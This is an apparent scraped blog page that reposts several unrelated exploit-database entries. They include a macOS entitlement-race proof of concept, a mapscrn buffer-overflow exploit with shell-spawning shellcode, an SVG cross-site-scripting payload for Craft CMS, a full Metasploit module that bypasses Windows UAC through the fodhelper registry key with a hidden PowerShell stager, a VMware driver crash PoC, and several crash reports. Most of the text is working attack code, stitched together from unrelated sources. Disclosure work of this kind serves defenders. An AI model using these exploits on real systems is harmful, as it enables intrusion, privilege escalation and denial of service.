/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1223
One way processes in userspace that offer mach services check whether they should perform an action on
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
These decisions are made using the audit token which is appended by the kernel to every received mach message.
The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
The canonical way which userspace daemons check a message sender's entitlements is as follows:
audit_token_t tok;
xpc_connection_get_audit_token(conn, &tok);
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
CFErrorRef err;
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
to build the SecTaskRef:
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
{
SecTaskRef task;
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
...
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
This pid now maps to the entitlements of that new binary.
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
have its pid reused by the respawned entitled process.
Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
as they are created.
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
if the audit token was always checked.
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
of whitelisted binaries.
This may also open up access to privileged information which is protected by the entitlements.
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
entitlement and pass the check without having that entitlement.
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
use an lldb invocation like:
sudo lldb -w -n corecaptured
then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
PoC tested on MacOS 10.12.3 (16D32)
*/
// ianbeer
#if 0
MacOS/iOS userspace entitlement checking is racy
One way processes in userspace that offer mach services check whether they should perform an action on
behalf of a client from which they have received a message is by checking whether the sender possesses a certain entitlement.
These decisions are made using the audit token which is appended by the kernel to every received mach message.
The audit token contains amongst other things the senders uid, gid, ruid, guid, pid and pid generation number (p_idversion.)
The canonical way which userspace daemons check a message sender's entitlements is as follows:
audit_token_t tok;
xpc_connection_get_audit_token(conn, &tok);
SecTaskRef sectask = SecTaskCreateWithAuditToken(kCFAllocatorDefault, tok);
CFErrorRef err;
CFTypeRef entitlement = SecTaskCopyValueForEntitlement(sectask, CFSTR("com.apple.an_entitlement_name"), &err);
/* continue and check that entitlement is non-NULL, is a CFBoolean and has the value CFBooleanTrue */
The problem is that SecTaskCreateWithAuditToken only uses the pid, not also the pid generation number
to build the SecTaskRef:
SecTaskRef SecTaskCreateWithAuditToken(CFAllocatorRef allocator, audit_token_t token)
{
SecTaskRef task;
task = SecTaskCreateWithPID(allocator, audit_token_to_pid(token));
...
This leaves two avenues for a sender without an entitlement to talk to a service which requires it:
a) If the process can exec binaries then they can simply send the message then exec a system binary with that entitlement.
This pid now maps to the entitlements of that new binary.
b) If the process can't exec a binary (it's in a sandbox for example) then exploitation is still possible if the processes has the ability to
crash and force the restart of a binary with that entitlement (a common case, eg via an OOM or NULL pointer deref in a mach service.)
The attacker process will have to crash and force the restart of a process with the entitlement a sufficient number of times to wrap
the next free pid around such that when it sends the request to the target then forces the entitled process to crash it can crash itself and
have its pid reused by the respawned entitled process.
Scenario b) is not so outlandish, such a setup could be achieved via a renderer bug with ability to gain code execution in new renderer processes
as they are created.
You would also not necessarily be restricted to just being able to send one mach message to the target service as there's no
constraint that a mach message's reply port has to point back to the sending process; you could for example stash a receive right with
another process or launchd so that you can still engage in a full bi-directional communication with the target service even
if the audit token was always checked.
The security implications of this depend on what the security guarantees of entitlements are. It's certainly the case that this enables
you to talk to a far greater range of services as many system services use entitlement checks to restrict their clients to a small number
of whitelisted binaries.
This may also open up access to privileged information which is protected by the entitlements.
This PoC just demonstrates that we can send an xpc message to a daemon which expects its clients to have the "com.apple.corecapture.manager-access"
entitlement and pass the check without having that entitlement.
We'll target com.apple.corecaptured which expects that only the cctool or sharingd binaries can talk to it.
use an lldb invocation like:
sudo lldb -w -n corecaptured
then run this poc and set a breakpoint after the hasEntitlement function in the CoreCaptureDaemon library.
You'll notice that the check passes and our xpc message has been received and will now be processes by the daemon.
Obviously attaching the debugger like this artificially increases the race window but by for example sending many bogus large messages beforehand
we could ensure the target service has many messages in its mach port queue to make the race more winnable.
PoC tested on MacOS 10.12.3 (16D32)
#endif
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <mach/mach.h>
#include <xpc/xpc.h>
void exec_blocking(char* target, char** argv, char** envp) {
// create the pipe
int pipefds[2];
pipe(pipefds);
int read_end = pipefds[0];
int write_end = pipefds[1];
// make the pipe nonblocking so we can fill it
int flags = fcntl(write_end, F_GETFL);
flags |= O_NONBLOCK;
fcntl(write_end, F_SETFL, flags);
// fill up the write end
int ret, count = 0;
do {
char ch = ' ';
ret = write(write_end, &ch, 1);
count++;
} while (!(ret == -1 && errno == EAGAIN));
printf("wrote %d bytes to pipe buffer\n", count-1);
// make it blocking again
flags = fcntl(write_end, F_GETFL);
flags &= ~O_NONBLOCK;
fcntl(write_end, F_SETFL, flags);
// set the pipe write end to stdout/stderr
dup2(write_end, 1);
dup2(write_end, 2);
execve(target, argv, envp);
}
xpc_connection_t connect(char* service_name){
xpc_connection_t conn = xpc_connection_create_mach_service(service_name, NULL, XPC_CONNECTION_MACH_SERVICE_PRIVILEGED);
xpc_connection_set_event_handler(conn, ^(xpc_object_t event) {
xpc_type_t t = xpc_get_type(event);
if (t == XPC_TYPE_ERROR){
printf("err: %s\n", xpc_dictionary_get_string(event, XPC_ERROR_KEY_DESCRIPTION));
}
printf("received an event\n");
});
xpc_connection_resume(conn);
return conn;
}
int main(int argc, char** argv, char** envp) {
xpc_object_t msg = xpc_dictionary_create(NULL, NULL, 0);
xpc_dictionary_set_string(msg, "CCConfig", "hello from a sender without entitlements!");
xpc_connection_t conn = connect("com.apple.corecaptured");
xpc_connection_send_message(conn, msg);
// exec a binary with the entitlement to talk to that daemon
// make sure it doesn't exit by giving it a full pipe for stdout/stderr
char* target_binary = "/System/Library/PrivateFrameworks/CoreCaptureControl.framework/Versions/A/Resources/cctool";
char* target_argv[] = {target_binary, NULL};
exec_blocking(target_binary, target_argv, envp);
return 0;
}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863583124
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: GNU/Linux - Kali 2017.1 Release
#
# Description: Mapscrn ( Part of setfont ) 2.0.3
# The mapscrn command loads a user defined output character mapping table into the console driver.
# The console driver may be later put into use user-defined mapping table mode by outputting a special
# escape sequence to the console device.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Architecture: all
#
# Vendor homepage: http://ccross.msk.su
#
# Source and destination overlap in strcpy(0xbe95fc4c, 0xbe9610df)
# at 0x4831518: strcpy (vg_replace_strmem.c:506)
# by 0x10A71F: ??? (in /usr/bin/mapscrn)
# by 0x10933B: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
#
# Invalid read of size 2
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
# Address 0x41414141 is not stack'd, malloc'd or (recently) free'd
#
# Process terminating with default action of signal 11 (SIGSEGV)
# Access not within mapped region at address 0x41414141
# at 0x488DFCA: getenv (getenv.c:84)
# by 0x48867AE: guess_category_value (dcigettext.c:1587)
# by 0x48867AE: __dcigettext (dcigettext.c:667)
# by 0x48855F5: dcgettext (dcgettext.c:47)
# by 0x109733: ??? (in /usr/bin/mapscrn)
# by 0x41414140: ???
import os,subprocess
junk = "\x41" * 4880 # junk to offset
nops = "\x90" * 24 # nops
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
esp = "\xe0\xdf\xff\xbf" # Must be changed
buffer = junk + esp + nops + shellcode # Craft the buffer
try:
print("[*] Mapscrn Stack-Based Buffer Overflow by Juan Sacco")
print("[*] Please wait.. running")
subprocess.call(["mapscrn", buffer])
except OSError as e:
if e.errno == os.errno.ENOENT:
print "Mapscrn not found!"
else:
print "Error executing exploit"
raise
# Exploit Title: Craft CMS 2.6 - Cross-Site Scripting/Unrestricted File Upload
# Date: 2017-06-08
# Exploit Author: Ahsan Tahir
# Vendor Homepage: https://craftcms.com
# Software Link: http://download.craftcdn.com/craft/2.6/2.6.2981/Craft-2.6.2981.zip
# Version: 2.6
# Tested on: [Kali Linux 2.0 | Windows 8.1]
# Email: mrahsan1337@gmail.com
# Contact: https://twitter.com/AhsanTahirAT
Release Date:
=============
2017-06-08
Product & Service Introduction:
===============================
Craft is a content-first CMS that aims to make life enjoyable for developers and content managers alike.
Abstract Advisory Information:
==============================
Ahsan Tahir, an independent security researcher discovered a Persistent Cross-Site Scripting Vulnerability through Unrestricted File Upload of SVG file in Craft CMS (v2.6)
Vulnerability Disclosure Timeline:
==================================
2017-06-08: Found the vulnerability.
2017-06-08: Reported to vendor.
2017-06-08: Published.
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
The security risk of the xss vulnerability is estimated as medium with a common vulnerability scoring system count of 3.6.
Exploitation of the persistent xss web vulnerability requires a limited editor user account with low privileged (only editing news) and only low user interaction.
If attacker upload any file that can use for XSS (HTML, SWF, PHP etc..) it will not accept to uplaod as image. But for images it will stay the same. So if attacker upload SVG with JS content it will work fine and execute JS!
The "Content-Type: image/svg+xml; charset=us-ascii" header will make this XSS attack work.
Successful exploitation of the XSS vulnerability results in persistent phishing attacks, session hijacking, persistent external redirect to malicious sources and persistent manipulation of affected or connected web module context.
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by a low prviledged user/editor with privileges, only for editing news. After successful exploitation, this attack can be used by editor to hijack admin account!
For security demonstraton or to reproduce the vulnerability follow the provided information and steps below to continue.
Payload (Exploitation):
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
[+] Manual steps to reproduce ..
1. Login with the editor account (only privilege to edit news) in Craft CMS
2. Go to 'add news' option: https://localhost/admin/entries/news/new
3. Put random values in title
4. In your attacker machine, create a file named 'xss.svg' (without quotes) and inject the payload in the file:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
4. Upload the xss.svg file in featured image option in Craft CMS
5. Click on Save
6. Now go to: https://localhost/s/assets/site/xss.svg
7. XSS payload execution occurs and alert pop-up with domain name
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
# Exploit Title: Unquoted Service Path Privilege Escalation - Net Monitor for Employees Pro <= 5.3.4
# Date: 18/03/2017
# Exploit Author: Saeid Atabaki
# E-Mail: bytecod3r <at> gmail.com, saeid <at> Nsecurity.org
# Linkedin: https://www.linkedin.com/in/saeidatabaki
# Vendor Homepage: http://networklookout.com/
# Version: <= 5.3.4
# CVE: CVE-2017-7180
# Vendor Not Resoponding. contacted vendor 18/3/2017
Net Monitor for Employees is an application to monitor users machine and its agent based. Its agent install itself as a service ("Net Monitor for Employees Agent") with an unquoted service path running with SYSTEM privileges. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system.
C:\Users\Win7>sc qc "Net Monitor for Employees Agent"
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: Net Monitor for Employees Agent
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Net Monitor for Employees Pro\bin\nmep_ctrlagentsvc.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Net Monitor for Employees Agent
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
A successful attempt would require the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c) BYTECOD3R
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/exe'
require 'msf/core/exploit/powershell'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Exploit::Powershell
include Post::Windows::Priv
include Post::Windows::Registry
include Post::Windows::Runas
FODHELPER_DEL_KEY = "HKCU\\Software\\Classes\\ms-settings".freeze
FODHELPER_WRITE_KEY = "HKCU\\Software\\Classes\\ms-settings\\shell\\open\\command".freeze
EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
EXEC_REG_VAL = ''.freeze # This maps to "(Default)"
EXEC_REG_VAL_TYPE = 'REG_SZ'.freeze
FODHELPER_PATH = "%WINDIR%\\System32\\fodhelper.exe".freeze
CMD_MAX_LEN = 16383
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows UAC Protection Bypass (Via FodHelper Registry Key)',
'Description' => %q{
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under
the current user hive, and inserting a custom command that will get invoked when
the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC
flag turned off.
This module modifies a registry key, but cleans up the key once the payload has
been invoked.
The module does not require the architecture of the payload to match the OS. If
specifying EXE::Custom your DLL should call ExitProcess() after starting your
payload in a separate process.
},
'License' => MSF_LICENSE,
'Author' => [
'winscriptingblog', # UAC bypass discovery and research
'amaloteaux', # MSF module
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
],
'DefaultTarget' => 0,
'References' => [
[
'URL', 'https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/',
'URL', 'https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1'
]
],
'DisclosureDate' => 'May 12 2017'
)
)
end
def check
if sysinfo['OS'] =~ /Windows (10)/ && is_uac_enabled?
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
commspec = '%COMSPEC%'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
# Make sure we have a sane payload configuration
if sysinfo['Architecture'] == ARCH_X64
if session.arch == ARCH_X86
# fodhelper.exe is x64 only exe
commspec = '%WINDIR%\\Sysnative\\cmd.exe'
if target_arch.first == ARCH_X64
# We can't use absolute path here as
# %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
psh_path = "powershell.exe"
end
end
if target_arch.first == ARCH_X86
# Invoking x86, so switch to SysWOW64
psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
end
else
# if we're on x86, we can't handle x64 payloads
if target_arch.first == ARCH_X64
fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
end
end
if !payload.arch.empty? && (payload.arch.first != target_arch.first)
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
fail_with(Failure::NotVulnerable,
"UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
when UAC_DEFAULT
print_good('UAC is set to Default')
print_good('BypassUAC can bypass this setting, continuing...')
when UAC_NO_PROMPT
print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
shell_execute_exe
return
end
payload_value = rand_text_alpha(8)
psh_path = expand_path(psh_path)
template_path = Rex::Powershell::Templates::TEMPLATE_DIR
psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
if psh_payload.length > CMD_MAX_LEN
fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
end
psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
if existing.empty?
registry_createkey(FODHELPER_WRITE_KEY, registry_view)
end
print_status("Configuring payload and stager registry keys ...")
unless exist_delegate
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
end
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
# Calling fodhelper.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
cmd_path = expand_path(commspec)
cmd_args = expand_path("/c #{FODHELPER_PATH}")
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(5)
handler(client)
print_status("Cleaining up registry keys ...")
unless exist_delegate
registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
end
if existing.empty?
registry_deletekey(FODHELPER_DEL_KEY, registry_view)
else
registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
end
registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
print_status('UAC is Enabled, checking level...')
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')
else
if admin_group
print_good('Part of Administrators group! Continuing...')
else
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
end
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
end
end
end
/*
* Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
* CVE: 2017-4916 (VMSA-2017-0009)
* Author: Borja Merino (@BorjaMerino)
* Date: May 18, 2017
* Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
* Affected: VMware Workstation Pro/Player 12.x
* Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
* driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
*/
#include "windows.h"
#include "stdio.h"
void ioctl_crash()
{
HANDLE hfile;
WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
DWORD dummy;
char reply[0x3FDC];
hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";
DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
}
void run_vix()
{
STARTUPINFO si;
PROCESS_INFORMATION pi;
RtlZeroMemory(&si, sizeof(si));
RtlZeroMemory(&pi, sizeof(pi));
si.dwFlags |= STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
DWORD createFlags = CREATE_SUSPENDED;
CreateProcess(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi);
}
void main()
{
run_vix(); //Comment this if vixDiskMountServer.exe is already running
ioctl_crash();
}
Source: http://seclists.org/oss-sec/2017/q1/458
Description:
Mujstest, which is part of mupdf is a scriptable tester for mupdf + js.
A crafted image posted early for another issue, causes a stack overflow.
The complete ASan output:
# mujstest $FILE
==32127==ERROR: AddressSanitizer: stack-buffer-overflow on address
0x7fff29560b00 at pc 0x00000047cbf3 bp 0x7fff29560630 sp 0x7fff2955fde0
WRITE of size 1453 at 0x7fff29560b00 thread T0
#0 0x47cbf2 in __interceptor_strcpy /tmp/portage/sys-devel/llvm-3.9.1-
r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_interceptors.cc:548
#1 0x50e903 in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
source/platform/x11/jstest_main.c:358:7
#2 0x7f68df3c578f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-
r3/work/glibc-2.23/csu/../csu/libc-start.c:289
#3 0x41bc18 in _init (/usr/bin/mujstest+0x41bc18)
Address 0x7fff29560b00 is located in stack of thread T0 at offset 1056 in
frame
#0 0x50c45f in main /tmp/portage/app-text/mupdf-1.10a/work/mupdf-1.10a-
source/platform/x11/jstest_main.c:293
This frame has 7 object(s):
[32, 1056) 'path'
[1184, 2208) 'text' <== Memory access at offset 1056 partially underflows
this variable
[2336, 2340) 'w' <== Memory access at offset 1056 partially underflows
this variable
[2352, 2356) 'h' <== Memory access at offset 1056 partially underflows
this variable
[2368, 2372) 'x' <== Memory access at offset 1056 partially underflows
this variable
[2384, 2388) 'y' <== Memory access at offset 1056 partially underflows
this variable
[2400, 2404) 'b' 0x1000652a4160:[f2]f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2
f2 f2
0x1000652a4170: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4180: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a4190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000652a41b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32127==ABORTING
Affected version:
1.10a
Fixed version:
N/A
Commit fix:
N/A
Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.
CVE:
CVE-2017-6060
Reproducer:
https://github.com/asarubbo/poc/blob/master/00147-mupdf-mujstest-stackoverflow-main
Timeline:
2017-02-05: bug discovered and reported to upstream
2017-02-17: blog post about the issue
2017-02-17: CVE assigned via cveform.mitre.org
Note:
This bug was found with Address Sanitizer.
Permalink:
https://blogs.gentoo.org/ago/2017/02/17/mupdf-mujstest-stack-based-buffer-overflow-in-main-jstest_main-c
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42139.zip
Source: https://bugs.ghostscript.com/show_bug.cgi?id=697500
POC to trigger null pointer dereference (mutool)
After some fuzz testing I found a crashing test case.
Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642
To reproduce: mutool convert -F cbz nullptr_fz_paint_pixmap_with_mask -o /dev/null
ASAN:
==1406==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000020 (pc 0x000000849633 bp 0x7ffdb430c750 sp 0x7ffdb430c620 T0)
==1406==The signal is caused by a READ memory access.
==1406==Hint: address points to the zero page.
#0 0x849632 in fz_paint_pixmap_with_mask XYZ/mupdf/source/fitz/draw-paint.c:1948:2
#1 0x60208c in fz_draw_pop_clip XYZ/mupdf/source/fitz/draw-device.c:1618:4
#2 0x54e716 in fz_pop_clip XYZ/mupdf/source/fitz/device.c:301:3
#3 0x8fb76f in pdf_grestore XYZ/mupdf/source/pdf/pdf-op-run.c:338:4
#4 0x901149 in pdf_run_xobject XYZ/mupdf/source/pdf/pdf-op-run.c:1347:5
#5 0x8ffa0f in begin_softmask XYZ/mupdf/source/pdf/pdf-op-run.c:148:3
#6 0x8fac2f in pdf_begin_group XYZ/mupdf/source/pdf/pdf-op-run.c:188:23
#7 0x8fac2f in pdf_show_shade XYZ/mupdf/source/pdf/pdf-op-run.c:219
#8 0x8fac2f in pdf_run_sh XYZ/mupdf/source/pdf/pdf-op-run.c:1943
#9 0x92cc20 in pdf_process_keyword XYZ/mupdf/source/pdf/pdf-interpret.c:770:5
#10 0x929741 in pdf_process_stream XYZ/mupdf/source/pdf/pdf-interpret.c:953:6
#11 0x92870f in pdf_process_contents XYZ/mupdf/source/pdf/pdf-interpret.c:1043:3
#12 0x8e9edc in pdf_run_page_contents_with_usage XYZ/mupdf/source/pdf/pdf-run.c:46:3
#13 0x8e99c7 in pdf_run_page_contents XYZ/mupdf/source/pdf/pdf-run.c:69:3
#14 0x553e12 in fz_run_page_contents XYZ/mupdf/source/fitz/document.c:318:4
#15 0x55423b in fz_run_page XYZ/mupdf/source/fitz/document.c:350:2
#16 0x4e8021 in runpage XYZ/mupdf/source/tools/muconvert.c:67:2
#17 0x4e7d85 in runrange XYZ/mupdf/source/tools/muconvert.c:83:5
#18 0x4e76c7 in muconvert_main XYZ/mupdf/source/tools/muconvert.c:165:4
#19 0x4e6943 in main XYZ/mupdf/source/tools/mutool.c:112:12
#20 0x7f6d6818a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#21 0x41a218 in _start (XYZ/mupdf/build/debug/mutool+0x41a218)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV XYZ/mupdf/source/fitz/draw-paint.c:1948:2 in fz_paint_pixmap_with_mask
==1406==ABORTING
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42138.zip
Source: https://www.chiark.greenend.org.uk/~sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html
summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections
class: vulnerability: This is a security vulnerability.
difficulty: fun: Just needs tuits, and not many of them.
priority: high: This should be fixed in the next release.
present-in: 0.67
fixed-in: 4ff22863d895cb7ebfced4cf923a012a614adaa8 (0.68)
Many versions of PuTTY prior to 0.68 have a heap-corrupting integer overflow bug in the ssh_agent_channel_data function which processes messages sent by remote SSH clients to a forwarded agent connection.
The agent protocol begins every message with a 32-bit length field, which gives the length of the remainder of the message, not including the length field itself. In order to accumulate the entire message including the length field in an internal buffer, PuTTY added 4 to the received length value, to obtain the message length inclusive of everything. This addition was unfortunately missing a check for unsigned integer overflow.
